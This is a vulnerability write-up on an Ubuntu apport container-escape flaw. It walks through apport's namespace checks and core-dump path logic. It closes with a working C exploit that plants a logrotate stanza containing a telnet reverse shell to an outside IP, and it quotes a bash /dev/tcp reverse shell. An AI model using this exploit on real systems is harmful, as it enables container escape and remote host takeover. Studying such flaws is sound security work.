First, let's look at the vulnerability description.
The fix adds handling for the case where "the is_same_ns() function fails open (returning True)". In other words, before the fix, when is_same_ns() failed open, nothing replaced the local pid with the global pid. So with a special trick we can make execution take none of the branches above and simply fall through.

def is_same_ns(pid, ns):
    if not os.path.exists('/proc/self/ns/%s' % ns) or \
       not os.path.exists('/proc/%s/ns/%s' % (pid, ns)):
        # If the namespace doesn't exist, then it's obviously shared
        return True

    try:
        if os.readlink('/proc/%s/ns/%s' % (pid, ns)) == os.readlink('/proc/self/ns/%s' % ns):
            # Check that the inode for both namespaces is the same
            return True
    except OSError as e:
        if e.errno == errno.ENOENT:
            return True
        else:
            raise

    return False
Source before the fix

# Check if we received a valid global PID (kernel >= 3.12). If we do,
# then compare it with the local PID. If they don't match, it's an
# indication that the crash originated from another PID namespace.
# Simply log an entry in the host error log and exit 0.
if len(sys.argv) == 6:
    host_pid = int(sys.argv[5])

    if not is_same_ns(host_pid, "pid") and not is_same_ns(host_pid, "mnt"):
        # If the crash came from a container, don't attempt to handle
        # locally as that would just result in wrong system information.
        # Instead, attempt to find apport inside the container and
        # forward the process information there.
        if not os.path.exists('/proc/%d/root/run/apport.socket' % host_pid):
            error_log('host pid %s crashed in a container without apport support' %
                      sys.argv[5])
            sys.exit(0)

        [ ... ]

        sys.exit(0)
    elif not is_same_ns(host_pid, "pid") and is_same_ns(host_pid, "mnt"):  # here
        # If it doesn't look like the crash originated from within a
        # full container, then take the global pid and replace the local
        # pid with it, then move on to normal handling.

        # This bit is needed because some software like the chrome
        # sandbox will use container namespaces as a security measure but are
        # still otherwise host processes. When that's the case, we need to keep
        # handling those crashes locally using the global pid.
        sys.argv[1] = str(host_pid)
    elif not is_same_ns(host_pid, "mnt"):
        error_log('host pid %s crashed in a separate mount namespace, ignoring' % host_pid)
        sys.exit(0)
Source after the fix

    elif not is_same_ns(host_pid, "mnt"):
        error_log('host pid %s crashed in a separate mount namespace, ignoring' % host_pid)
        sys.exit(0)
    else:
        # If it doesn't look like the crash originated from within a
        # full container or if the is_same_ns() function fails open (returning
        # True), then take the global pid and replace the local pid with it,
        # then move on to normal handling.

        # This bit is needed because some software like the chrome
        # sandbox will use container namespaces as a security measure but are
        # still otherwise host processes. When that's the case, we need to keep
        # handling those crashes locally using the global pid.
        sys.argv[1] = str(host_pid)
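To make the difference between the two versions easier to see, here is a minimal Python sketch of the branch logic only. The helper handled_pid and its boolean parameters are hypothetical stand-ins for the two is_same_ns() calls, and I am assuming that the first `if` branch is unchanged by the fix, since the patched excerpt only shows the tail of the chain.

```python
def handled_pid(local_pid, host_pid, same_pid_ns, same_mnt_ns, patched):
    """Return the pid apport goes on to handle, or None if it exits early.

    same_pid_ns / same_mnt_ns stand in for is_same_ns(host_pid, "pid") and
    is_same_ns(host_pid, "mnt"). This helper is hypothetical and only
    models the if/elif chain quoted in the article.
    """
    if not same_pid_ns and not same_mnt_ns:
        return None                  # full container: forwarded, then exit
    if not patched:
        if not same_pid_ns and same_mnt_ns:
            return host_pid          # sandbox case: switch to the global pid
        if not same_mnt_ns:
            return None              # separate mount namespace: ignored
        return local_pid             # fall-through: local pid is kept
    if not same_mnt_ns:
        return None                  # separate mount namespace: ignored
    return host_pid                  # patched else-branch: always global pid


# Both checks "fail open" (return True) for a container process whose
# local pid is 7 and whose host pid is 6552.
print(handled_pid(7, 6552, True, True, patched=False))  # 7
print(handled_pid(7, 6552, True, True, patched=True))   # 6552
```

Before the fix, the container-local pid survives and is later treated as if it were a host pid, which is the whole basis of the escape described in this post.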
Following the hints in the CVE information, we trace the source.
We can see that the (possibly replaced) pid is passed into get_pid_info. Here is the source:

def get_pid_info(pid):
    '''Read /proc information about pid'''

    global pidstat, real_uid, real_gid, cwd

    # unhandled exceptions on missing or invalidly formatted files are okay
    # here -- we want to know in the log file
    pidstat = os.stat('/proc/%s/stat' % pid)

    # determine real UID of the target process; do *not* use the owner of
    # /proc/pid/stat, as that will be root for setuid or unreadable programs!
    # (this matters when suid_dumpable is enabled)
    with open('/proc/%s/status' % pid) as f:
        for line in f:
            if line.startswith('Uid:'):
                real_uid = int(line.split()[1])
            elif line.startswith('Gid:'):
                real_gid = int(line.split()[1])
                break
    assert real_uid is not None, 'failed to parse Uid'
    assert real_gid is not None, 'failed to parse Gid'

    cwd = os.readlink('/proc/' + pid + '/cwd')
It declares some global variables and then assigns cwd. os.readlink() returns the target of a symbolic link, and reading further shows that this value is used to build the path of the core file. Next we go straight to the part that writes the core.
I chose the SIGQUIT signal because its handling comes early in apport and involves almost no checks.

def write_user_coredump(pid, cwd, limit, from_report=None):
    '''Write the core into the current directory if ulimit requests it.'''

    # three cases:
    # limit == 0: do not write anything
    # limit < 0: unlimited, write out everything
    # limit nonzero: crashed process' core size ulimit in bytes

    if limit == 0:
        return

    # don't write a core dump for suid/sgid/unreadable or otherwise
    # protected executables, in accordance with core(5)
    # (suid_dumpable==2 and core_pattern restrictions); when this happens,
    # /proc/pid/stat is owned by root (or the user suid'ed to), but we already
    # changed to the crashed process' real uid
    assert pidstat, 'pidstat not initialized'
    if pidstat.st_uid != os.getuid() or pidstat.st_gid != os.getgid():
        error_log('disabling core dump for suid/sgid/unreadable executable')
        return

    core_path = os.path.join(cwd, 'core')
    try:
        with open('/proc/sys/kernel/core_uses_pid') as f:
            if f.read().strip() != '0':
                core_path += '.' + str(pid)
        core_file = os.open(core_path, os.O_WRONLY | os.O_CREAT | os.O_EXCL, 0o600)
    except (OSError, IOError):
        return

    error_log('writing core dump to %s (limit: %s)' % (core_path, str(limit)))

    written = 0

    # Priming read
    if from_report:
        r = apport.Report()
        r.load(from_report)
        core_size = len(r['CoreDump'])
        if limit > 0 and core_size > limit:
            error_log('aborting core dump writing, size %i exceeds current limit' % core_size)
            os.close(core_file)
            os.unlink(core_path)
            return
        error_log('writing core dump %s of size %i' % (core_path, core_size))
        os.write(core_file, r['CoreDump'])
    else:
        # read from stdin
        block = os.read(0, 1048576)

        while True:
            size = len(block)
            if size == 0:
                break
            written += size
            if limit > 0 and written > limit:
                error_log('aborting core dump writing, size exceeds current limit %i' % limit)
                os.close(core_file)
                os.unlink(core_path)
                return
            if os.write(core_file, block) != size:
                error_log('aborting core dump writing, could not write')
                os.close(core_file)
                os.unlink(core_path)
                return
            block = os.read(0, 1048576)

    os.close(core_file)
    return core_path
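What you see in /proc/sys/kernel/core_pattern on your machine may differ from mine. Mine has been modified to suit the current environment, which I will explain when we set the environment up. This file mainly decides how the generated core is named and which arguments are passed along from the kernel's coredump.c.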
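As a reading aid, the following Python sketch splits a piped core_pattern into its handler and arguments. The specifier descriptions are paraphrased from core(5); the function name describe_core_pattern is hypothetical, and the pattern string is the one this post ends up using.

```python
# Meanings paraphrased from core(5); only specifiers mentioned in this post.
SPECIFIERS = {
    "%p": "PID of the dumped process, as seen in its own PID namespace",
    "%P": "PID of the dumped process, as seen in the initial PID namespace",
    "%s": "number of the signal causing the dump",
    "%c": "core file size soft resource limit of the crashing process",
    "%d": "dump mode (same value as prctl PR_GET_DUMPABLE)",
    "%E": "pathname of the executable, with '/' replaced by '!'",
}


def describe_core_pattern(pattern):
    """Split a piped core_pattern into (handler, [(specifier, meaning), ...]).

    Returns (None, []) when the pattern is a plain file-name template.
    """
    if not pattern.startswith("|"):
        return None, []
    parts = pattern[1:].split()
    if not parts:
        return None, []
    handler, args = parts[0], parts[1:]
    return handler, [(arg, SPECIFIERS.get(arg, "unknown")) for arg in args]


handler, args = describe_core_pattern("|/usr/share/apport/apport %p %s %c %d %P")
print(handler)
for spec, meaning in args:
    print(spec, "->", meaning)
```

The point to notice is that %p (argv[1]) and %P (argv[5]) are two different views of the same process, which is exactly what the pid replacement in apport is about.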
/proc/sys/kernel/core_uses_pid
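This one probably differs on your machine too. A value of 1 means the generated core file name gets a .pid suffix, and 0 means it does not. A specifier in core_pattern can do the same job, but in apport this file takes priority.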
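The path logic from write_user_coredump can be isolated into a few lines. This is only a sketch for illustration: core_path_for is a hypothetical helper, and it takes the content of core_uses_pid as a string argument instead of reading the file.

```python
import os


def core_path_for(cwd, pid, core_uses_pid):
    """Mirror the core path logic of write_user_coredump.

    core_uses_pid is the text read from /proc/sys/kernel/core_uses_pid.
    """
    path = os.path.join(cwd, "core")
    if core_uses_pid.strip() != "0":
        path += "." + str(pid)
    return path


print(core_path_for("/etc/logrotate.d", 6552, "1\n"))  # /etc/logrotate.d/core.6552
print(core_path_for("/etc/logrotate.d", 6552, "0\n"))  # /etc/logrotate.d/core
```

Since cwd comes from /proc/<pid>/cwd, whoever controls which process that pid refers to also controls the directory the core is written into.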
/proc/sys/kernel/pid_max
def init_error_log():
    '''Open a suitable error log if sys.stderr is not a tty.'''

    if not os.isatty(2):
        log = os.environ.get('APPORT_LOG_FILE', '/var/log/apport.log')
        try:
            f = os.open(log, os.O_WRONLY | os.O_CREAT | os.O_APPEND, 0o600)
            try:
                admgid = grp.getgrnam('adm')[2]
                os.chown(log, -1, admgid)
                os.chmod(log, 0o640)
            except KeyError:
                pass  # if group adm doesn't exist, just leave it as root
        except OSError:  # on a permission error, don't touch stderr
            return
        os.dup2(f, 1)
        os.dup2(f, 2)
        sys.stderr = os.fdopen(2, 'wb')
        if sys.version_info.major >= 3:
            sys.stderr = io.TextIOWrapper(sys.stderr)
        sys.stdout = sys.stderr


def error_log(msg):
    '''Output something to the error log.'''

    apport.error('apport (pid %s) %s: %s', os.getpid(), time.asctime(), msg)
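Log messages are written with error_log(str). Because apport does not initialize its log on the first line, I changed the script slightly so that the log is initialized at the very start. Running it again showed that the error came from %E. After removing it, core_pattern became the value shown earlier:
|/usr/share/apport/apport %p %s %c %d %P
get_pid_info accesses several files belonging to the given pid. If no process with that pid exists on the host, those files do not exist either and an error is raised. So we need a process with that pid to exist on the host. Only then is a core generated, and that core is written into the directory of the host process with that pid.
cwd = os.readlink('/proc/' + pid + '/cwd')
Taking this line as an example, you can see that it resolves to the path the program is running in.
So if a process inside docker has pid 6552, then once it escapes to the host, the matching process is the one shown in the figure, and the core is written to that process's path. That leaves two questions:
How do we get past the two checks in apport, so that neither branch is taken?
How do we make sure that the pid from inside docker happens to match a pid that exists on the host?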
Solving the first problem
For the first problem we can exploit a race condition. First, the source.
If we make the first check return True, and the check in the following elif return True as well, both branches are bypassed. The cases that return True are:

def is_same_ns(pid, ns):
    if not os.path.exists('/proc/self/ns/%s' % ns) or \
       not os.path.exists('/proc/%s/ns/%s' % (pid, ns)):
        # If the namespace doesn't exist, then it's obviously shared
        return True  # ======================= here

    try:
        if os.readlink('/proc/%s/ns/%s' % (pid, ns)) == os.readlink('/proc/self/ns/%s' % ns):
            # Check that the inode for both namespaces is the same
            return True  # ===================== here
    except OSError as e:
        if e.errno == errno.ENOENT:
            return True  # ====================== here
        else:
            raise

    return False
The case we want to exploit is the first one. How do we make the first return fire? We only need to kill the corresponding pid before apport reaches this point.

int pid = fork();
if (pid) {
    /* kill the child process, after it stimulate the core dump */
    usleep(2000);
    kill(pid, SIGKILL);
} else {
    /* must stimulate the raise before kill */
    raise(SIGQUIT); // to make core
}
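The fail-open behaviour can be reproduced safely without touching the real /proc. The sketch below copies is_same_ns and adds a proc parameter (my addition, not part of apport) so that it can run against a fake directory tree. Removing the fake namespace link plays the role of the process being killed.

```python
import errno
import os
import tempfile


def is_same_ns(pid, ns, proc="/proc"):
    """Copy of the article's is_same_ns with a configurable proc root.

    The proc parameter is an addition for this sketch only.
    """
    mine = os.path.join(proc, "self", "ns", ns)
    theirs = os.path.join(proc, str(pid), "ns", ns)
    if not os.path.exists(mine) or not os.path.exists(theirs):
        return True                  # fail-open: the target is already gone
    try:
        if os.readlink(theirs) == os.readlink(mine):
            return True
    except OSError as e:
        if e.errno == errno.ENOENT:
            return True              # vanished between the two checks
        raise
    return False


with tempfile.TemporaryDirectory() as fake_proc:
    # Build <fake_proc>/self/ns/pid and <fake_proc>/6552/ns/pid as symlinks
    # to two different existing files, i.e. two different "namespaces".
    for owner in ("self", "6552"):
        ns_dir = os.path.join(fake_proc, owner, "ns")
        os.makedirs(ns_dir)
        target = os.path.join(fake_proc, "ns-of-" + owner)
        open(target, "w").close()
        os.symlink(target, os.path.join(ns_dir, "pid"))

    alive = is_same_ns(6552, "pid", proc=fake_proc)
    os.remove(os.path.join(fake_proc, "6552", "ns", "pid"))  # "kill" pid 6552
    dead = is_same_ns(6552, "pid", proc=fake_proc)

print(alive, dead)  # False True
```

While the target exists, the function correctly reports a different namespace. Once it disappears, the answer flips to True, which is what the kill in the C snippet is racing for.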
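Solving the second problem
We can fork a large number of processes and have them wait, so that they hold on to pids. One more point deserves emphasis: every process inside docker also has a corresponding pid on the host, so it really has two pids. The path associated with the host-side pid is effectively the same as the path inside docker, so by controlling the working directory of the process inside docker we can control where the core is generated.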
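The "two pids" of a containerized process can be read from the NSpid line of /proc/<pid>/status (available since Linux 4.1 according to proc(5)). Here is a small Python sketch that parses it. The function name namespace_pids is hypothetical and the sample text is made up for illustration, not captured from a real machine.

```python
def namespace_pids(status_text):
    """Return the pids listed on the NSpid line of /proc/<pid>/status text.

    Per proc(5), the leftmost entry is relative to the PID namespace of the
    procfs mount and the following entries belong to successively nested
    inner namespaces. An empty list means the line is absent.
    """
    for line in status_text.splitlines():
        if line.startswith("NSpid:"):
            return [int(field) for field in line.split()[1:]]
    return []


# Hypothetical excerpt, as it might look when read on the host for a
# process running inside a container.
sample = "Name:\tsleep\nPid:\t6552\nNSpid:\t6552\t7\nUid:\t0\t0\t0\t0\n"
print(namespace_pids(sample))  # [6552, 7]
```

On a real host you would pass in the content of /proc/<pid>/status for a container process. The first number is what %P carries and the last is what %p carries.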
With the steps above, it is easy to make the core of a process that crashed inside docker appear on the host.
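Before generating a core we also need to check the configuration.
First run ulimit -c to check the size limit for core files. It may be 0, and with a limit of 0 no core is generated, so we need to set ulimit -c unlimited.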
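The same limit can be inspected from Python with the standard resource module. This is just a sketch, and core_limit_description is a hypothetical helper. Note that getrlimit reports bytes, which matches the "limit" cases listed in write_user_coredump.

```python
import resource


def core_limit_description():
    """Describe the soft RLIMIT_CORE of the current process."""
    soft, _hard = resource.getrlimit(resource.RLIMIT_CORE)
    if soft == resource.RLIM_INFINITY:
        return "unlimited"
    if soft == 0:
        return "0 (no core will be written)"
    return "%d bytes" % soft


print(core_limit_description())
```

The limit is inherited by child processes, so it has to be set in the shell (or process) that later launches the crashing program.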
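source /etc/security/limits.conf
According to what people say online, changing the settings in limits.conf should make this permanent, with no need to redo it after every boot. In practice, though, I still had to configure it again on every boot.
Sometimes the core is generated inside docker, which I find baffling. Setting aside the fact that a program crashing inside docker does not produce a core there, apport runs outside docker, so the path of the core it writes should also be a path outside docker. The paths look identical, but a core that shows up inside docker and not on the host really puzzles me. Take /etc/logrotate.d/, a path that exists both inside and outside docker: sometimes apport reports that the core was written under /etc/logrotate.d/, yet it turns out to be under that path inside docker. Fortunately this only happens some of the time.
Escape, step two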
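We can now get the core to escape, but what use is that on its own? We need it to be executed, and even plain execution is not enough: a core mostly holds information saved from just before the program crashed. Unless we can control what goes into the core, running it directly gets us nothing.
Others have long since worked out an answer for this situation: Linux crontab, which exists to run scheduled tasks. Among them is logrotate, a default scheduled task on Ubuntu. For an explanation of how to exploit it, see here.
With a scheduled task in the picture, triggering execution is no longer a problem. But what do we execute?
A core stores the state of the program just before it crashed, and strings are stored along with it.
logrotate is covered in the link above. When it processes its rule files, it ignores invalid content in the file and only acts on the valid parts.
So we can write the commands we want to run as a string inside the crashing program. The generated core starts with a lot of garbage, but string variables are preserved fairly well. The string should be declared as a global variable, so that it sits in the data segment and is kept largely intact. If it were a local variable on the stack, garbage would be mixed into it and interfere with execution.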
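To see why a global string survives in a core, it helps to look at a binary blob the way the strings tool does. The Python sketch below pulls runs of printable ASCII out of a byte string. Both printable_runs and the fake_core blob are made up for illustration, with a harmless marker stanza standing in for real content.

```python
import re


def printable_runs(blob, min_len=8):
    """Return runs of printable ASCII (plus tab/newline) found in blob."""
    pattern = rb"[\t\n\x20-\x7e]{%d,}" % min_len
    return [m.group().decode("ascii") for m in re.finditer(pattern, blob)]


# Hypothetical stand-in for a core file: binary noise around one string
# that was stored contiguously, as a global char array would be.
marker = b"\n/var/log/example/*log {\n daily\n}\n"
fake_core = b"\x7fELF\x02\x01\x00" + bytes(range(0x80, 0x90)) + marker + b"\x00\xff\x00"

for run in printable_runs(fake_core):
    print(repr(run))
```

The only run of at least 8 printable bytes is the marker itself, in one piece. A string scattered across stack frames would instead show up as several short fragments separated by noise.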
What has been said so far is not enough. We also need to look at the format logrotate expects, that is, how the rule is written.
The part between postrotate and endscript is the shell part. One more thing to note: /var/log/cups/*log at the top names the files the rule applies to, so the commands are operations on those files. If no matching file exists, the commands are not run. Speaking of which, logrotate's actual purpose is to tidy up log files periodically, compressing them or handling them in other ways. See man logrotate for details.

#include <stdio.h>
#include <signal.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/wait.h>

/*
/var/log/cups/*log {
    daily
    missingok
    rotate 7
    sharedscripts
    postrotate
        telnet 172.17.0.2 1234 | /bin/bash | telnet 192.168.56.246 4321
    endscript
}
*/
char payload[] = "\n/var/log/cups/*log {\n daily\n missingok\n rotate 7\n sharedscripts\n postrotate\n telnet 172.17.0.2 1234 | /bin/bash | telnet 192.168.56.246 4321\n endscript\n}\n";

void fork_bomb(int num)
{
    int i;
    for (i = 0; i < num; i++) {
        int pid = fork();
        if (pid) {
            wait(NULL);
        }
    }
}

int main(int argc, char const *argv[])
{
    chdir("/etc/logrotate.d");
    int i;
    for (i = 0; i < 5; i++) {
        fork_bomb(200);
        int pid = fork();
        if (pid) {
            /* kill the child process, after it stimulate the core dump */
            usleep(2000);
            kill(pid, SIGKILL);
        } else {
            /* must stimulate the raise before kill */
            raise(SIGQUIT); // to make core
        }
        usleep(1000 * 100);
        puts("wait... maybe the core has already been generated :)");
    }
    return 0;
}
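telnet 172.17.0.2 1234 | /bin/bash | telnet 192.168.56.246 4321 is a reverse shell. For the meaning of the individual arguments, see here.
Run the exp inside docker. You can interrupt it yourself after a while. When the core appears is purely a matter of luck: with good luck it shows up in the corresponding host directory shortly after starting, with bad luck it can take a long time. Some cores are empty because the kill came too early. The 2 ms I used (usleep(2000)) is not the best delay, so feel free to experiment to find a better one.
Once the core exists, waiting for the scheduled run takes too long, so we trigger it manually:
logrotate -f [filename]
Also, don't forget to listen on the corresponding ports on your own machine. Because of the reverse shell command I used, two terminals have to listen: one for typing commands and one that returns their output. This is explained in the link above. The reason for this roundabout setup is that what I tried first,
bash -i >& /dev/tcp/<attacker-ip>/<port> 0>&1
raised an error, so I made do with something else.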
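References:
Lu Yu (卢宇), "Docker逃逸:从一个进程崩溃讲起" (Docker Escape: Starting from a Process Crash), DiDi security conference slides
A summary of several common reverse shells: https://blog.csdn.net/qiuyeyijian/article/details/102993592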
A technical description of CVE-2020-15702 - Flatt Security Blog (hatenablog.com)
https://wiki.ubuntu.com/Apport